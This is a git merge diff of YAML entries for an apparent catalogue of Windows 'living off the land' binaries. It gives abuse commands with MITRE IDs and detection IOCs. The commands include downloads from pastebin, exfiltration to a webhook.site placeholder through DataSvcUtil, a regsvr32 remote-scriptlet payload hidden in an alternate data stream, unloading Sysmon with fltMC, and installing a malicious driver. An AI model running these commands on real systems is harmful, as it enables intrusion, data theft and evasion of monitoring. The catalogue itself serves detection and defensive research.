Merge branch 'master' into fixing-yaml-issues

yml/OSBinaries/AppInstaller.yml

@@ -0,0 +1,22 @@
+---
+Name: AppInstaller.exe
+Description: Tool used for installation of AppX/MSIX applications on Windows 10
+Author: 'Wade Hickey'
+Created: '2020-12-02'
+Commands:
+  - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
+    Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY> 
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
+Resources:
+  - Link: https://twitter.com/notwhickey/status/1333900137232523264
+Acknowledgement:
+  - Person: Wade Hickey
+    Handle: '@notwhickey'
+---

yml/OSBinaries/Aspnet_Compiler.yml

@@ -0,0 +1,28 @@
+---
+Name: Aspnet_Compiler.exe
+Description: ASP.NET Compilation Tool 
+Author: Jimmy (@bohops)
+Created: 2021-09-26
+Commands:
+  - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
+    Description: Execute C# code with the Build Provider and proper folder structure in place.
+    Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
+  - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
+Code_Sample: 
+  - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
+Detection: 
+  - IOC: Sysmon Event ID 1 - Process Creation
+Resources:
+  - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
+  - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
+Acknowledgement:
+  - Person: cpl
+    Handle: '@cpl3h'
+---

yml/OSBinaries/Certutil.yml

@@ -1,6 +1,6 @@
 ---
 Name: Certutil.exe
-Description: Windows binary used for handeling certificates
+Description: Windows binary used for handling certificates
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:

yml/OSBinaries/Cmd.yml

@@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows
 Author: 'Ye Yint Min Thu Htut'
 Created: 2019-06-26
 Commands:
-  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
+  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
     Description: Add content to an Alternate Data Stream (ADS).
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS

yml/OSBinaries/DataSvcUtil.yml

@@ -0,0 +1,30 @@
+---
+Name: DataSvcUtil.exe
+Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
+Author: 'Ialle Teixeira'
+Created: '01/12/2020'
+Commands:
+  - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
+    Description: Upload file, credentials or data exfiltration in general
+    Usecase: Upload file
+    Category: Upload
+    Privileges: User
+    MitreID: T1567
+    MitreLink: https://attack.mitre.org/techniques/T1567/
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
+Code_Sample: 
+  - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
+Detection: 
+  - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
+  - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
+  - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
+Resources:
+  - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe
+  - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services
+  - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services
+Acknowledgement:
+  - Person: Ialle Teixeira
+    Handle: '@NtSetDefault'
+---

yml/OSBinaries/Dllhost.yml

@@ -0,0 +1,30 @@
+---
+Name: Dllhost.exe
+Description: Used by Windows to DLL Surrogate COM Objects
+Author: 'Nasreddine Bencherchali'
+Created: '2020-11-07'
+Commands:
+  - Command: dllhost.exe /Processid:{CLSID}
+    Description: Use dllhost.exe to load a registered or hijacked COM Server payload.
+    Usecase: Execute a DLL Surrogate COM Object.
+    Category: Execute
+    Privileges: User
+    MitreID: T1546.015
+    MitreLink: https://attack.mitre.org/techniques/T1546/015/
+    OperatingSystem: Windows 10 (and likely previous versions)
+Full_Path:
+  - Path: C:\Windows\System32\dllhost.exe
+  - Path: C:\Windows\SysWOW64\dllhost.exe
+Code_Sample: 
+- Code:
+Detection:
+ - IOC:
+Resources:
+  - Link: https://twitter.com/CyberRaiju/status/1167415118847598594
+  - Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
+Acknowledgement:
+  - Person: Jai Minton
+    Handle: '@CyberRaiju'
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
+---

yml/OSBinaries/Findstr.yml

@@ -42,7 +42,7 @@ Full_Path:
 Code_Sample:
 - Code:
 Detection:
- - IOC: finstr.exe should normally not be invoked on a client system
+ - IOC: findstr.exe should normally not be invoked on a client system
 Resources:
   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

yml/OSBinaries/IMEWDBLD.yml

@@ -0,0 +1,22 @@
+---
+Name: IMEWDBLD.exe
+Description: Microsoft IME Open Extended Dictionary Module
+Author: 'Wade Hickey'
+Created: '2020-03-05'
+Commands:
+  - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
+    Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> 
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
+Resources:
+  - Link: https://twitter.com/notwhickey/status/1367493406835040265
+Acknowledgement:
+  - Person: Wade Hickey
+    Handle: '@notwhickey'
+---

yml/OSBinaries/Msbuild.yml

@@ -20,6 +20,14 @@ Commands:
     MitreID: T1127
     MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: msbuild.exe project.proj
+    Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
+    Usecase: Execute project file that contains XslTransformation tag parameters
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10    
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
@@ -27,8 +35,9 @@ Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
-Code_Sample:
-- Code:
+  - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
+Code_Sample: 
+  - Code:
 Detection:
  - IOC: Msbuild.exe should not normally be executed on workstations
 Resources:
@@ -36,9 +45,12 @@ Resources:
   - Link: https://github.com/Cn33liz/MSBuildShell
   - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+  - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
   - Person: Cn33liz
     Handle: '@Cneelis'
----
+  - Person: Jimmy
+    Handle: '@bohops'
+---

yml/OSBinaries/Pnputil.yml

@@ -0,0 +1,23 @@
+---
+Name: Pnputil.exe
+Description: used for Install drivers.
+Author: Hai vaknin (lux)
+Created: 25/12/2020
+Commands:
+  - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
+    Description: used for Install drivers
+    Usecase: add malicious driver.
+    Category: Execute
+    Privileges: Administrator
+    MitreID: T1215
+    MitreLink: https://attack.mitre.org/techniques/T1215
+    OperatingSystem: Windows 10,7 
+Full_Path:
+  - Path: C:\Windows\system32\pnputil.exe
+Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
+Acknowledgement:
+  - Person: Hai Vaknin(Lux) 
+    Handle: 'LuxNoBulIshit'
+  - Person: Avihay eldad
+    Handle: 'aloneliassaf'
+---

yml/OSBinaries/Syncappvpublishingserver.yml

@@ -11,7 +11,7 @@ Commands:
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
 Full_Path:
   - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
   - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

yml/OSBinaries/Wsreset.yml

@@ -19,6 +19,7 @@ Code_Sample:
 Detection:
  - IOC: wsreset.exe launching child process other than mmc.exe
  - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
+ - IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen
 Resources:
   - Link: https://www.activecyber.us/activelabs/windows-uac-bypass
   - Link: https://twitter.com/ihack4falafel/status/1106644790114947073

yml/OSBinaries/fltMC.yml

@@ -0,0 +1,26 @@
+---
+Name: fltMC.exe
+Description: Filter Manager Control Program used by Windows
+Author: 'John Lambert'
+Created: '2021-09-18'
+Commands:
+  - Command: fltMC.exe unload SysmonDrv
+    Description: Unloads a driver used by security agents
+    Usecase: Defense evasion
+    Category: ADS 
+    Privileges: Admin
+    MitreID: T1562
+    MitreLink: https://attack.mitre.org/techniques/T1562/002/
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\fltMC.exe
+Code_Sample: 
+- Code:
+Detection:
+ - IOC: 4688 events with fltMC.exe
+Resources:
+  - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
+Acknowledgement:
+  - Person: Carlos Perez
+    Handle: '@Carlos_Perez'
+---